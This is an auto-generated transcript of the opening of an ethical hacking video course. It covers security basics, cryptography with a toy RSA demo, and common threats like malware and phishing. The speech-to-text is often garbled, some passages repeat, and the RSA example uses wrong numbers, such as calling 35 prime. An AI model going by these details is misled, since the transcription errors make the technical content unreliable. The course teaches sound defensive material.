(English (United States) ) Ethical Hacking Full Course - Learn Ethical Hacking in 10 Hours - Ethical Hacking Tutorial - Edureka (DownSub - Com)

Hi guys, my name
is Aarya and I'm going
to be your instructor
for this course today.
So in this Ethical
Hacking full course video,
we'll be learning almost

everything that is required
for you to get started

as an Ethical Hacker.
So come let's quickly go

over the topics
that we are going

to be covering today firstly.
We're going to be going

to the basics of cyber security
and cryptography
where we'll be learning

the key concepts
of confidentiality
integrity and availability
and how the cryptography

Concepts also tie
into the whole picture next.
We'll be looking
at some cyber threats.
We be seeing
how the Cyber threads

actually affect our computer
and then we will also see

how we can mitigate them.
After which we will be looking
into the history

of ethical hacking.
We learn how this all began
in the Massachusetts
Institute of Technology.
And then we will be looking

into the fundamentals
of networking and ethical

hacking in this will be learning
the various tools
that are used
in ethical hacking and also

the network architectures.
These tools are used

in after this.
We will be having a look
into what the most

famous operating systems
that is there.
That is Kali Linux.
Kali Linux is used

by ethical hackers
and penetration testers all
around the world

will be learning
how to install this
on our local systems

will be learning the tools
that come along with it
and Bash we should be using

them after that.
We'll be learning
about penetration testing
and penetration.
Testing is a subset
of ethical hacking.
So in this we will be learning

about a tool called Metasploit
and using Metasploit

will be learning.
Learn more about vulnerability

analysis and how we
can install back doors
in different computer systems
and take advantages
of these vulnerabilities now

nmap is also another tool
that we are going

to be discussing in this course,
we will be learning
how we can use nmap

to gather information
from our networks and
how we can use this information

to our advantage after that.
We'll be learning deeply

about three cyber attacks
that are there

in this industry first
is cross-site scripting secondly

distributed denial of service
and thirdly SQL

injection attacks.
Now we be doing these attacks

ourselves on dummy targets
and learning more

about these attacks
and how they are orchestrated

and thus we will be learning
more about how we

can mitigate them.
If we actually become
ethical hackers now,
we will also be discussing
some very Advanced cryptography

methods called steganography,
which is basically used

for hiding digital code
inside images last but not the

least we will be also discussing
how you could become
an ethical hacker yourself.
So we'll be discussing
a roadmap will also
be discussing the job profiles

that are there in the industry.
Re and we will also

be discussing the companies
that are hiring for these job

profiles along with the salaries
that they are trying to offer.
Also, we won't be leaving

hanging right there will also
be discussing the 50 most

common interview questions
that come along

with these job profiles
so that you can snag
that job interview and if you do

like our content in the end,
please leave us a like,
please leave a comment
if you want to and do hit

the Subscribe button
so that you can

join our ever-growing
community of learners.
It can be rightfully said
that today's generation

lives on the internet
and we generally users

are almost ignorant as to
how those random bits of ones
and zeros Rich securely

to a computer.
It's not magic its work

and sweat that makes sure
that your packets reach to you
on sniffed today Ira ball
from at Eureka.
I'm here to tell you guys

about how cybersecurity makes
this all possible now
before we begin let me brief

you all about the topics
that we're going to cover today.
So basically we're going

to ask three questions.
Options that are important
to cybersecurity firstly
we're going to see why
cyber security is needed next

we're going to see
what exactly is cyber security
and in the end I'm going

to show you also a scenario
how cybersecurity can save

a whole organization
from organized cybercrime.
Okay.
So let's get started.
Now as I just said we

are living in a digital era
whether it be booking a hotel

room ordering some dinner
or even booking a cab.
We're constantly using

the internet and inherently
constantly generating data

this data is generally He
stored on the cloud
which is basically a huge

data server or data center
that you can access online.
Also, we use an array
of devices to access
this data now for a hacker.
It's a golden age
with so many access points

public IP addresses
and constant traffic
and tons of data to exploit

black hat hackers are having
one hell of a time

exploiting vulnerabilities
and creating malicious software
for the same above

that cyber attacks are evolving
by the day hackers

are becoming smarter
and more creative

with their malware's.
And how they bypass virus scans
and firewalls still

baffled many people.
Let's go through some

of the most common types
of cyber attacks now,
so as you guys can see I've

listed out eight cyber attacks
that have plagued us since

the beginning of the internet.
Let's go through them briefly.
So first on the list,
we have General
malware's malware is
an all-encompassing term
for a variety of cyber threats
including Trojans viruses

and worms malware
is simply defined as code
with malicious intent
that typically steals

data or destroy.
On the computer
next on the list.
We have fishing often

posing as a request for data
from a trusted third

party phishing attacks are sent
via email and ask users

to click on a link
and enter the personal

data phishing emails have gotten
much more sophisticated in

recent years making it difficult
for some people to discern

a legitimate request
for information from a false

one phishing emails often fall
into the same category as

spam but are more harmful
than just a simple ad

next on the list.
We have password attacks.
It's a password attack is

exactly what it sounds
like a third party trying

to gain access to your system.
My tracking a user's password.
Next up is DDOS
which stands for

distributed denial-of-service
DDOS attack focuses
on disrupting the service

of a network a darker send
High volumes of data

or traffic through the network
that is making a lot

of connection requests
until the network

becomes overloaded
and can no longer

function next up.
We have man-in-the-middle
attacks by impersonating
the endpoint in
an online information.
That is the connection

from your smartphone
to a website the MIT.
Emma docs can obtain information

from the end users and entity he
or she is communicating
with for example,
if your Banking online

the man in the middle
would communicate with you

by impersonating your bank
and communicate with the bank

by impersonating you the man
in the middle would then receive

all the information transferred
between both parties
which could include

sensitive data such as
bank accounts and personal

information next up.
We have drive-by downloads

through malware on a Ledge.
Emmett website a program
is downloaded to a user system

just by visiting the site.
It doesn't require
any type of action
by the user to download
it actually next up.
We have mail advertising
which is a way to
compromise your computer
with malicious code
that is downloaded
to your system
when you click

on an effective ad lastly,
we have Rogue softwares,
which are basically malware's
that are masquerading as
legitimate and necessary

security software
that will keep your system safe.
So as you guys can see
now the internet sure

isn't the safe place.
As you might think

it is this not only applies
for us as individuals.
But also large organizations.
They're having multiple

cyber breaches in the past
that has compromised the privacy

and confidentiality of a data.
If we head over to the site

called information is beautiful.
We can see all

the major cyber breaches
that have been committed.
So as you guys can see even

big companies like eBay,
AOL Evernote Adobe

have actually gone
through major cyber breaches,
even though they have a lot

of security measures taken
to protect the data

that they contain
so it's not only
that small individuals

are targeted by hackers
and other people
but even bigger organizations

are constantly being targeted
by these guys.
So after looking at all sorts
of cyberattacks possible
the breaches of the past
and the sheer amount

of data available.
We must be thinking
that there must be some sort

of mechanism and protocol
to actually protect us from all

these sorts of cyberattacks
and indeed there is a way
and this is called

cyber security in
a Computing context security

comprises of cybersecurity
and physical security.
Both are used by

Enterprises to protect
against unauthorized access

to data centers
and other computerized

systems information security,
which is designed to maintain

the confidentiality integrity
and availability of data is
a subset of cybersecurity
the use of cyber.
Cybersecurity can help prevent
against cyberattacks data

breaches identity theft
and can Aid in Risk Management.
So when an organization
has a strong sense
of network security
and an effective
incident response plan,
it is better able to prevent
and mitigate these

attacks for example
and user protection defense

information and guards
against loss of theft
while also scanning computers

for malicious code.
Now when talking

about cybersecurity,
there are three main activities
that we are trying to protect

ourselves against and they
are Unauthorized modification

unauthorised deletion
and unauthorized access.
These freedoms are
very synonymous to the very

commonly known CIA Triad
which stands for confidentiality

integrity and availability.
The CIA Triad is also
commonly referred to as
a three pillars of security
and more security policies
of bigger organizations.
And even smaller companies are

based on these three principles.
So let's go through
them one by one.
So first on the list we have
confidentiality confidentiality
is roughly equivalent
to privacy measures
undertaken to ensure
confidentiality are designed

to prevent sensitive information
from reaching the wrong people
while making sure

that the right people
can in fact get it access

must be restricted.
To those authorized to view

the data in question
in as common as well for data

to be categorized
according to the amount
and type of damage
that could be done.
Should it fall into

unintended hands more
or less stringent measures

can then be implemented across
to those categories?
Sometimes safeguarding
data confidentiality meanwhile
special training for those privy
to such documents
such training would typically

include security risks
that could threaten

this information training
can help familiarize ourselves.
Her eyes people

with risk factors
and how to guard against them

further aspects of training
can include strong password
and password related

best practices
and information about social

engineering methods to prevent
them from bending

data handling rules
with good intention
and potentially
disastrous results.
Next on list.
We have integrity Integrity

involves maintaining
the consistency accuracy
and trustworthiness of data
over its entire lifecycle data

must not be changed in transit
and steps must be taken

to ensure that data.
Cannot be altered by
unauthorized people for example

in a breach of confidentiality.
These measures include
file permissions and user

access controls Version Control
may be used to prevent

are honest changes
or accidental deletion
by authorized users
becoming a problem.
In addition.
Some means must be in place

to detect any changes in data
that might occur as a result
of non-human caused events

such as electromagnetic pulses
or server crash
some data might include

checksums even cryptography.
Graphic checksums for

verification of Integrity backup
or redundancies must
be available to restore
the affected data

to its correct State last
but not least is availability

availability is best ensured
by rigorous maintaining
of all Hardware performing

Hardware repairs immediately
when needed and maintaining
a correctly functional
operating system environment
that is free
of software conflicts.
It's also important to keep

current with all necessary
system upgrades providing

adequate communication bandwidth
and preventing the occurrences
of Bottlenecks are equally

important redundancy failover
and even higher availability

clusters can mitigate
serious consequences
when hardware issues

do occur fast in
as adaptive Disaster
Recovery is essential
for the worst-case scenarios
that capacity is reliant

on the existence
of a comprehensive Disaster
Recovery plan safeguards
against data loss
or interruption in connection
must include unpredictable

events such as natural disasters
and file to prevent data loss
from such occurrences

a backup copy.
He must be stored
in a geographically
isolated location,
perhaps even in a fireproof

water safe place
extra security equipments

or software such as firewalls
and proxy servers
and goddess against down times
and unreachable data you
to malicious actions such as

denial-of-service attacks
and network intrusions.
So now that we have seen what we

are actually trying to implement
when trying to protect

ourselves on the internet.
We should also know the ways
that we actually
protect ourselves
when we are attacked

by cyber organizations.
So the Step to actually mitigate
any type of Cyber attack is
to identify the malware

or the Cyber threat
that is being currently going on

in your organization.
Next.
We have to actually analyze
and evaluate all

the affected parties
and the file systems
that have been compromised
and in the end we have

to patch the hole treatment
so that our organization

can come back
to its original running State

without any cyber breaches.
So how is it exactly done?
This is mostly done by actually

calculating three factors.
The first factor is vulnerable.
Leti the second factor is threat

and the third is risk.
So let me tell you about

the three of them a little bit.
So first on the list
of actual calculation is
we have vulnerability.
So a vulnerability refers
to a known weakness of an asset
that can be exploited by

one or more attackers.
In other words.
It is a known issue
that allows an attack

to be successful.
For example,
when a team member resigns

and you forget to disable
their access to external

accounts change logins
or remove their names
from the company credit

cards this leaves.
Your business open
to both unintentional
and intentional threats.
However, most vulnerabilities

are exploited by automated tacos
and not a human typing

on the other side
of the network.
Next testing for vulnerabilities
is critical to ensuring
the continued security
of your systems
by identifying weak points
and developing a strategy

to respond quickly.
Here are some questions
that you ask when determining

your security vulnerabilities.
So you have questions

like is your data backed up
and stored in a secure off-site

location is your data stored
in the cloud if yes,
how exactly is
it being protected
from cloud vulnerabilities?
What kind of security

do you have to determine
who can access modify
or delete information from

within your organization next
like you could ask questions
like what kind of antivirus

protection is in use?
What is the license currents are

the license current?
And is it running
as often as needed?
Also, do you have

a data recovery plan
in the event of
vulnerability being exploited?
These are the normal questions
that one asks when actually

checking their vulnerability.
Next up is thread a thread

refers to a new or newly
discovered incident with

potential to do harm to a system
or your overall organization.
There are three main types
of thread National
threats like floods
or tornadoes unintentional
threats such as employee
mistakingly accessing
the wrong information
and intentional threats.
There are many examples
of intentional threats including

spyware malware advert companies
or the Actions of disgruntled

employees in addition worms
and viruses are categorized
as threats because they

could potentially cause harm
to your organization through

exposure to an automated attack
as opposed to one
perpetrated by human beings.
Although these threats

are generally outside
of one's control and difficult

to identify in advance.
It is essential to take
appropriate measures to assess
threats regularly here are

some ways to do so and sure
that your team members

are staying informed
of current trends
in cyber security so they

can The identify new threats,
they should subscribe to blogs

like wired and podcast
like the Tech janek's Extreme it
that covers these issues
as well as join
professional associations,
so they can benefit
from breaking news feeds

conferences and webinars.
You should also perform

regular threat assessment
to determine the best approaches

to protecting a system
against the specific threat

along with assessing
different types of thread

in addition penetration,
testing involves modeling

real-world threats in order
to discover vulnerabilities
next on the List,
we have risk.
So risk refers to the potential

for loss or damage
when a threat exploits

a vulnerability examples
of risks include
Financial losses as a result
of business disruption loss
of privacy reputational
damage legal implications
and can even include loss
of life risk can also

be defined as follows,
which is basically threat

X the vulnerability you
can reduce the potential

for Risk by creating
and implementing a
risk management plan.
And here are the key aspects

to consider When developing
your Management strategy firstly

we need to assess risk
and determine needs
when it comes to designing
and implementing a
risk assessment framework.
It is critical to prioritize
the most important breaches
that need to be addressed all

the frequency May differ
in each organization.
This level of assessment

must be done
on a regular recurring basis.
Next.
We also have to include
a total stakeholder
perspective stakeholders include
the business owners as

well as employees customers
and even vendors all

of these players
have the potential

to negatively impact.
Actor organization,
but at the same time

they can be Assets
in helping to mitigate risk.
So as we see risk management

is the key to cybersecurity.
So now let's go
through a scenario
to actually understand
how cybersecurity actually
defend an organization against

very manipulative cybercrime.
So cyber crime
as we all know is
a global problem
that's been dominating

the new cycle.
It poses a threat
to individual security
and an even bigger threat

to large International companies
Banks and government

today's organized cybercrime.
Part of Shadows
loan hackers of Fast
and Now large organized crime

Rings function like startups
and often employ

highly trained developers
were constantly innovating

new online adapt
most companies have
preventative security software

to stop these types of attacks,
but no matter how secure we are

cyber crime is going to happen.
So meet Bob,
he's a chief security

officer for a company
that makes a mobile app

to help customers track
and manage their finances.
So security is a top priority.
So Bob's company has

an activity response.
Platform in place that automates

the entire cybersecurity process
the ARP software

integrates all the security
and ID software needed

to keep a large company
like Bob's secured

into a single dashboard
and acts as a hub
for the people processes
and Technology needed to respond

to and contain cyber doll.
Let's see how this platform

works in the case
of a security breach
while Bob is out
on a business trip
irregular activity occurs
on his account as
a user Behavior analytic engine
that monitors account activity.
Recognize a suspicious Behavior

involving late-night logins
and unusual amounts

of data being downloaded.
This piece of software

is the first signal
that something is wrong
and alert is sent to the next

piece of software in the chain,
which is the
security information
and event management system.
Now the ARP can orchestrate

a chain of events
that ultimately prevents

the company from encountering
a serious security disaster

the ARP connects
to a user directory software
that Bob's company uses.
Which immediately Cognizes

the user accounts belong
to an executive
who is out on a business trip
and then proceeds

to lock his account.
The ARP sends the incident
IP address to threat
intelligence software
which identifies the dress
as a suspected malware
civil as each piece
of security software runs.
The findings are recorded

in the ARP s incident,
which is already busy
creating a set of instructions
called A playbook
for a security analyst

to follow The analyst
and locks Bob's a bounce and

changes his passwords this time.
The software has determined

the attempted attack came
from a well-known
cyber crime organization
using stolen credentials.
Bob's credentials were stolen
when the hacker found

a vulnerability in his company's
firewall software and use it to

upload a malware infected file.
Now that we know
how the attack happened

the analyst uses
the ARP and identifies
and patches all the things

the ARP uses information
from endpoint tool to determine
Which machines need

to be patched recommends
how to pass them and then allows

the analyst to push the batches
to all the computers

and mobile devices instantly.
Meanwhile Bob has to allow

the legal Departments
of the breach
and the ARP instantly

notifies the correct version
of the situation
and the status of the incident
after the attack is contained
and Bob's account

is secured the analyst
and communicates which data may

have been stolen or compromised
during the incident.
He identifies which
geography is jurisdiction.
And Regulatory Agencies cover
the users and informations

affected by the adapter.
Then the ARB creates

a series of tasks.
So the organization can notify

the affected parties and follow
all relevant compliances
and liability procedures

in the past a security breach.
This large would have

required Bob's company
to involve several agencies
and third parties to solve

the problem a process
that could have taken

months or longer.
But in a matter of hours

the incident response platform
organized all of
the people processes.
Has and Technology to identify

and contain the problem find
the source of the attack

fix the vulnerability
and notify all affected parties
and in the future Bob and

his team will be able to turn
to cognitive security tools.

These tools will read
and learn from tens of thousands
of trusted publication blogs and

other sources of information.
This knowledge will uncover

new insights and patterns
and dissipate an isolate

and minimize attacks
as they happen and

immediately recommend actions
for Security Professionals

to take Keeping data safe
and companies like pops

out of the headlines.
Cryptography is essentially
important because it allows
you to securely protect data
that you don't want anyone else

to have access to it is used
to protect corporate Secrets

secure classified information
and to protect
personal information
to guard against things

like identity theft
and today's video

is basically going to be
about cryptography now
before we actually jump

into the session.
Let me give you guys

a brief on the topics
that we're going to cover today.
So first of all,
we're going to cover

what is cryptography
through the help

of a very simplistic scenario,
then we are going to go through
the classifications of Rafi and
how the different classification

algorithm works in the end.
I'm going to show you

guys a Nifty demo on
how a popular algorithm

called RSA actually works.
Now.
I'm going to take the help

of an example or a scenario
to actually explain.
What is cryptography.
All right.
So let's say we have

a person and let's call him Andy
now suppose Andy sends a message

to his friend Sam who's
on the other side

of the world now,
obviously he wants
this message to be private
and nobody else should Have

access to the message now.
He uses a public forum.
For example the internet

for sending this message.
The goal is to actually

secure this communication.
And of course we have to be

secured against someone now,
let's say there is

a smart guy called Eve
who is secretly got access

to your Communication channel
since this guy has access

to your communication.
He can do much more

than just eavesdrop.
For example, you can try

to change the message in itself.
Now this is just

a small example.
What if Eve actually gets access

to your private information.
Well that could actually result

in a big catastrophe.
So, how can an D be sure
that nobody in the middle could

access the message center sound.
The goal here is to make

communication secure and that's
where cryptography comes in.
So what exactly is cryptography?
Well cryptography
is the practice
and the study of techniques

for securing communication
and data in the

presence of adversaries.
So, let me take

a moment to explain
how that actually happens.
Well, first of all,

we have a message.
This message is firstly

converted into a Eric form
and then this numeric form

is applied with a key
called an encryption key
and this encryption key is used

in encryption algorithm.
So once the numeric message

and the encryption key
has been applied
in an encryption algorithm.
What we get is called

a cipher text.
Now this Cipher text

is sent over the network
to the other side of the world
where the other person

whose message is intended
for will actually use

a decryption key and use
the ciphertext as a parameter

of a decryption algorithm.
And then he'll get
what we actually send

as a message and
if some error had actually

occurred he'd get an arrow.
So let's see
how cryptography can help secure

the connection between Andy
and sound so
the protect his message
and the first converts

his readable message
to an unreadable form here.
He converts a message
to some random numbers
and after that he uses
a key to encrypt his message

after applying this key
to the numerical form

of his message.
He gets a new
value in cryptography.
We call this ciphertext.

So now if Andy
sends the ciphertext
or encrypted message
over Communication channel,
he won't have to worry
about somebody in the middle of

discovering the private message.
Even if somebody manages

to discover the message,
he won't be able
to decrypt the message
without having a proper key

to unlock this message.
So suppose Eve here

discovers the message
and he somehow manages

to tamper with the message
and message finally reaches

some Sam would need a key
to decrypt the message to

recover the original plaintext.
So using the key he

would convert a cipher.
X2 numerical value corresponding
to the plain text now after

using the key for decryption,
what will come out is

the original plain text message
or an adult now this error

is very important.
It is the way Sam knows
that message sent by Andy is

not the same as a message
that you receive.
So the error in a sense tells us
that Eve has tampered

with the message.
Now, the important thing

to note here is
that in modern
cryptography the security
of the system purely relies

on keeping the encryption
and decryption key secret

based on the type
of keys and encryption.
Algorithms cryptography
is classified under
the following categories.
Now cryptography is
broadly classified
under two categories namely
symmetric key cryptography

and a symmetric key cryptography
popularly also known as

public key cryptography.
Now symmetric key cryptography
is further classified
as classical cryptography
and modern cryptography
further drilling down classical

cryptography is divided into two
which is transposition cipher
and substitution Cipher on the

other hand modern cryptography.
He is divided into stream Cipher
and block Cipher

in the upcoming slides
are broadly explain all

these types of cryptography.
So let's start with symmetric

key cryptography first.
So symmetric key algorithms

are algorithms for cryptography
that use the same cryptographic

keys for broad encryption
of plaintext and decryption
of ciphertext the keys

may be identical
or there may be some simple

transformation to go
between the two keys the keys
in practice represent
a shared secret
between two or more parties
that can be used to maintain
a private information
link this requirement
that both parties have access
to the secret key is

not the main drawbacks
of symmetric key
encryption in comparison
to public key encryption also
known as a symmetric
key encryption now
symmetric key cryptography
is sometimes also called

secret key cryptography
and the most popular

symmetric key system is
the data encryption standards,
which also stands

for D EAS next up.
We're going to discuss

transposition Cipher.
So in cryptography
a transposition cipher
is a method of encryption
by which the positions held

by units of plain text,
which are commonly
characters are groups
of characters are shifted

according to a regular system
so that the ciphertext

constitutes a permutation
of the plain text.
That is the order

of units is changed.
The plaintext is reordered now,
mathematically speaking
a bijective function is used
on the characters position
to encrypt and an inverse

function to decrypt.
So as you can see
that there is an example

All on the slide.
So on the plain text side,

we have a message,
which says meet me

after the party.
Now.
This has been carefully arranged

in the encryption Matrix,
which has been divided

into six rows and the columns.
So next we have a key
which is basically
for to 165 and then
we rearranged by looking
at the plain text Matrix
and then we get the cipher text
which basically is
some unreadable gibberish
at this moment.
So that's how this

whole algorithm works
on the other hand
when the ciphertext Being

converted into the plain text
The plaintext Matrix

is going to be referred
and it can be done

very easily moving on.
We are going to discuss

substitution Cipher.
So substitution of single letter

separately simple substitution
can be demonstrated
by writing out the alphabets
in some order to represent

the substitution.
This is termed a substitution

alphabet the cipher
the alphabet may be shifted
or reversed creating the Caesar
and upstage Cipher

respectively or scrambled
in a more complex fashion.
In which case it is called

a mixed Alpha bit
or deranged alphabet
traditionally mixed alphabets

may be created by first writing
out keyword removing

repeated letters in it.
Then writing all the remaining

letters in the alphabet
in the usual order now

consider this example shown
on the slide using the system.
We just discussed
the keyword zebras gives
us the following alphabets
from the plain text alphabet,
which is a to z.
So the ciphertext alphabet
is basically zebras Then

followed by all the alphabets.
We have missed out

in the zebra word.
So as you guys,
Can see it's zebras followed

by s c d e f g h
and so on now suppose

we were to actually
encrypt a message
using this code.
on the screen,
I've shown you an example,
which is a message flee at once.
We are discovered
is being actually
encrypted using this code.
So if you guys can see

out here the F letter
actually corresponds to S.
And then the L letter

actually corresponds
to I out here then we actually

get the cipher text which is Si
a a is that you using the code
and the process that I just

discussed now traditionally,
the cipher text

is written out in blocks
of fixed length omitting

punctuations and spaces.
This is done to help avoid
transmission errors to disguise
the word boundaries

from the plain text.
Now these blocks

are called groups
and sometimes a group count.
That is the number of groups

is given as an additional
check now five-letter

groups are traditional
as you guys can see
that we have also divided

our ciphertext into groups
of five and this dates back.
Back to when messages

were actually used
to be transmitted by Telegraph.
Now if the length
of the message happens

not to be divisible by 5.
It may be padded
at the end with nulls
and these can be any characters
that can be decrypted

to obvious nonsense.
So the receiver
can easily spot them
and discard them next on

our list is stream Cipher.
So a stream Cipher is a method
of encrypting text
to produce Cipher text
in which a cryptographic key
and algorithm are applied

to each binary digit
in a data stream
one bit at a time.
This method is not much used

in modern cryptography.
The main alternative method

is block Cipher in which a key
and algorithm are applied
to block of data rather than

individual bits in a stream.
Okay.
So now that we've spoken

about block Cipher let's go
and actually explain what block
Cipher does a block Cipher

is an encryption method that
A deterministic algorithm
for the symmetric key

to encrypt a block
of text rather than encrypting

one bit at a time as
in stream ciphers.
For example, a common block

Cipher AES encryption
128-bit blocks with a key

of predetermined length.
That is either 128 192

or 256 bits in length.
Now block ciphers
are pseudo-random
permutation families
that operate on the fixed size

of block of bits.
These prps our function
that cannot be
differentiated from completely
random permutation
and thus are A reliable

and been proven to be unreliable
by some Source.
Okay.
So now it's time
that we discussed
some asymmetric cryptography.
So asymmetric cryptography also
known as public key cryptography

is any cryptography system
that uses pair of keys,
which is a public key

which may be disseminated widely
and private Keys
which are known

only to the owner.
This accomplishes
two functions authentication
where the public key verify is
that a holder of the paired

private key send the message
and encryption where only

the paired private key holder.
Decrypt the message encrypted
with the public key and

a public key encryption system.
Any person can encrypt a message

using the receivers public key
that encrypted message

can only be decrypted
with the receivers private key.
So to be practical
the generation of public

and private key pair
must be computationally
economical the strength
of a public key
cryptography system relies
on computational efforts
required to find the private key
from its paid public key.
So effective security
only requires keeping

the private key private
and the public key

can be a openly distributed
without compromising security.
Okay.
So now that I've

actually shown you guys
how cryptography actually

works and how
the different classifications

are actually applied.
Let's go and do
something interesting.
So you guys are actually

watching this video
on YouTube right now.
So if you guys actually go
and click on the secure part

besides the URL you
can actually go and view

the digital certificates
that are actually used out here.
So click on certificates
and you'll see the details

in the details.
Up.
Now as you guys can see

the signature algorithm
that is used
for actually securing YouTube

is being shot 256 with RSA
and RC is a very very
common encryption algorithm
that is used
throughout the internet then

the signature hash algorithm
that is being used is sha-256.
And the issue is

Googling internet Authority
and you can get

a lot of information
about sites and all

their Authority Key identifiers
or certificate policies
the key usage and a lot of thing
about security just from

this small little button audio.
Also, let me show you
a little how public key

encryption actually works.
So on the side,
which is basically
cobwebs dot CSV or UGA dot edu.
You can actually demo out

public key encryption.
So suppose we had to send

a message first we would need
to generate keys.
So as you can see,
I just click generate keys

and it got me two keys,
which is one is the public key,
which I will distribute

for the network and one.
Private key which I will

actually keep secret to myself.
Now.
I want to send a message
saying hi there.
When is the exam tomorrow?
So now we are going to encrypt

it using the public key
because that's exactly

what's distributed.
So now as you can see we

have got our ciphertext saw
this huge thing right

out here is ciphertext
and absolutely makes no sense

whatsoever now suppose we were
to actually then
decrypt the message we

would Would use the private key
that goes along with our account

and we would decode the message
and as you guys can see

voila we have hi there
when the exam tomorrow.
So we are actually
sent a message
on the internet in a very

secure fashion above that.
There's also our essay

that needs some explaining
because I had promised

that to now RSA is a very
very commonly used algorithm
that is used
throughout the internet
and you just saw it

being used by YouTube.
So it has to be common.
So RSA has a very unique way

of applying this algorithm.
There are many actual parameters

that you actually
need to study.
Okay.
So now we're actually

going to discuss Odyssey,
which is a very popular

algorithm that is used
for of the internet.
And you also saw
that it's being used

by YouTube right now.
So this cryptosystem is one

of the initial system.
It remains most employed

cryptosystem even today
and the system was invented

by three Scholars,
which is Ron rivest ADI

Shamir and Len adleman
hence the name RSA and we

will see the two aspects
of the RSA cryptosystem.
Firstly generation of key pair
and secondly encryption

decryption algorithms.
So each person or a party
who desires to participate
in communication using
encryption needs to generate
a pair of keys namely

public key and private key.
So the process followed

in the generation of keys is
as follows first,
we have to actually calculate
n now n is actually given

by multiplying p and Q
as you guys can see out here.
So p and Q are supposed to be

very large prime numbers so
out here P will be 35,
but Are some very

strong encryption we
are going to choose very

large prime numbers.
Then we actually have

to calculate Phi L Phi is you
can see the formula

goes is p minus 1
into Q minus 1 and this

helps us determine
for the encryption algorithm.
Now, then we have to actually
calculate e now he
must be greater than 1
and less than Phi
which is p minus 1
into Q minus 1 and there must be

no common factors for e +
5 except for one.
So in other words,
they must be co-prime

to each other.
Now to form the public key

the pair of numbers
n and E from the RSA

public Key System.
This is actually made public

and is distributed
throughout the network

interestingly though,
N is a part of the public key

and the difficulty
in factorizing a large
prime number ensures
that the attacker

cannot find in finite time.
The two primes that is p and Q
that is used to obtain n this

actually ensures the strength
of RSA now in the generation

of the private key.
The private key D is It from p q

and E for given n and E.
There is a unique number D. Now.
The number D is the inverse

of B modulo 5.
This means that D is a number

less than five such that
when multiplied by E.
It gives one.
So let's go and actually

fill up these numbers.
So n should be 35 out Hill
and if we generate them

we get the value of V,
which is 24,
which is basically 4 into 6,
and then we should also get It's

now he should be co-prime.
So we are going to give it 11

as 11 is co-prime to both.
So now for the actual encryption

part we have to put in p
and N out here
so he out here for us is 11
and N is 35 and then we

are going to pick a letter
to actually Cipher
which is a and then we're going
to encode it as a number.

we've encoded as
one and out here now.
After we've given the message

it's numerical form.
We click on encryption
and we get it now to actually

decrypt the message.
We are going to need d

and n now D for us was 5
and N was 35 so 5 and 35
and then we're going

to take encrypted message
from above and we're going

to decrypt this message.
So after you decrypt it,
we have the numerical form

of the plaintext
and then decode the messages

click here decode messages.
And as you guys can see we have

decoded the message using RSA.
So guys that's
how I receive Oaks.
I explained all the factors
that we actually use

in our essay from n25 to e to D.
And I hope you understood

a part of it
if y'all are still
more interested y'all can

actually research a lot
on our say it's a very

in-depth cryptography system p
and N now D for us was 5

and N was 35 so 5 and 35.
And then we're going

to take encrypted message
from above and we're going

to decrypt this message.
So after you decrypted we

have the numerical form
of the plaintext
and then decode the messages

click here decode message.
And as you guys can see we have

decoded the message using RSA.
So guys, that's
how I receive books.
I explained all the factors
that we actually use

in our essay from n25 to e to D.
And I hope you understood

a part of it.
If y'all are still
more interested y'all can

actually research a lot
on our say it's a very in-depth

cryptography system just
as pollution was a side effect

of the Industrial Revolution.
So are the many

security vulnerabilities
that come with the

increase internet connectivity
cyber attacks are exploitations
of those vulnerabilities
for the most part individuals
and businesses have found ways

to counter cyber attacks using
a variety of security measures.
And just Good Old Common Sense.

We are going to examine eight
of the most common

cyber security threats
that your business could face

and the ways to avoid them.
So before we actually
jump into the session,
let me give you how the session

will actually work.
We are going to discuss

the most 8 common cyber threats.

in particular what they are
how the threat works

and how to protect yourself.
Okay.
So now let's jump
in now cyber attacks

are taking place all the time.
Even as we speak the security of

some organization big or small.
All is being compromised.
For example,
if you visit this site out here

that is threat Cloud.
You can actually view

all the cyber attacks
that are actually

happening right now.
Let me just give you

a quick demonstration of
how that looks like.
Okay, so as you
guys can see out here,
these are all the places that

are being compromised right now.
The red Parts actually

show us the part
that is being compromised
and the yellow places
actually show us from where

it's being compromised from.
Okay, as you guys can see now
that someone from Madeline's

is actually attacking this place
and someone from USA

was attacking Mexico.
It's a pretty interesting site
and actually gives you a scale

of how many cyber attacks
are actually happening

all the time in the world.
Okay now getting back I think

looking at all these types
of cyber attacks.
It's only necessary
that we educate ourselves

about all the types
of cyber threats that we have.
So these are
the eight cyber threats
that we're going to be

discussing today firstly.
We're going to start

off with malware.
So malware is
an all-encompassing term.
Or a variety of cyber attacks

including Trojans viruses
and worms malware

is simply defined as code
with malicious intent
that typically steals data
or destroy something
on the computer.
The way malware goes about doing
its damage can be helpful
in categorizing what kind

of malware you're dealing with.
So let's discuss it.
So first of all viruses like

the biological namesakes viruses
attach themselves to clean files
and infect other clean files

and they can spread
uncontrollably damaging
a systems core functionality.
I'm deleting or
corrupting files.
They usually appear

as executable files
that you might have downloaded

from the internet.
Then there are also Trojans.
Now this kind
of malware disguises
itself as legitimate software
or is included in legitimate
software that can be tampered
with it tends to act discreetly

and creates back doors
in your security to let

other malware sin.
Then we have worms worms.
In fact entire networks

of devices either local
or across the Internet by using

the Network's interfaces.
It uses each consecutive

infected machine.
To infect more and then

we have botnets and such
where botnets are networks
of infected computers
that are made to work together
under the controller

of an attacker.
So basically you
can encounter malware
if you have some OS

vulnerabilities or
if you download some legitimate

software from somewhere
or you have some

other email attachment
that was compromised with
Okay.
So how exactly
do you remove malware
or how exactly do you

fight against it?
Well, each form of malware

has its own way of infecting
and damaging computers
and data and so each one
requires a different
malware removal method.
The best way to prevent malware

is to avoid clicking on links
or downloading attachments
from unknown senders.
And this is sometimes done
by deploying a robust
and updated firewall
which prevents the transfer

of large data files
over the network in a hope

to be doubt attachments
that may contain malware.

It's also important
oughtn't to make sure
your computer's operating system
whether it be Windows Mac

OS Linux uses the most
up-to-date security updates
and software programmers

update programs frequently
to address any holes

or weak points,
and it's important to install

all these updates as
well as to decrease
your own system weaknesses.
So next up on our list of

cyber threats we have fishing.
So what exactly is fishing
well often posing as

a request for data
from a trusted third

party phishing attacks
are sent via email
and ask Those to click on a link
and enter their personal

data phishing emails have gotten
much more sophisticated

in recent years
and making it difficult
for some people to discern

a legitimate request
for an information
from a false one now

phishing emails often fall
into the same category as

spam but are way more harmful
than just a simple ad
so how exactly
does fishing work.
Well most people associate

fishing with email message
that spoof or mimic Bank

credit card companies
or other Genesis
like Amazon eBay
and Facebook these messages look

at entik and attempt
to get victims to reveal

their personal information.
But email messages are
only one small piece

of a phishing scam
from beginning to end

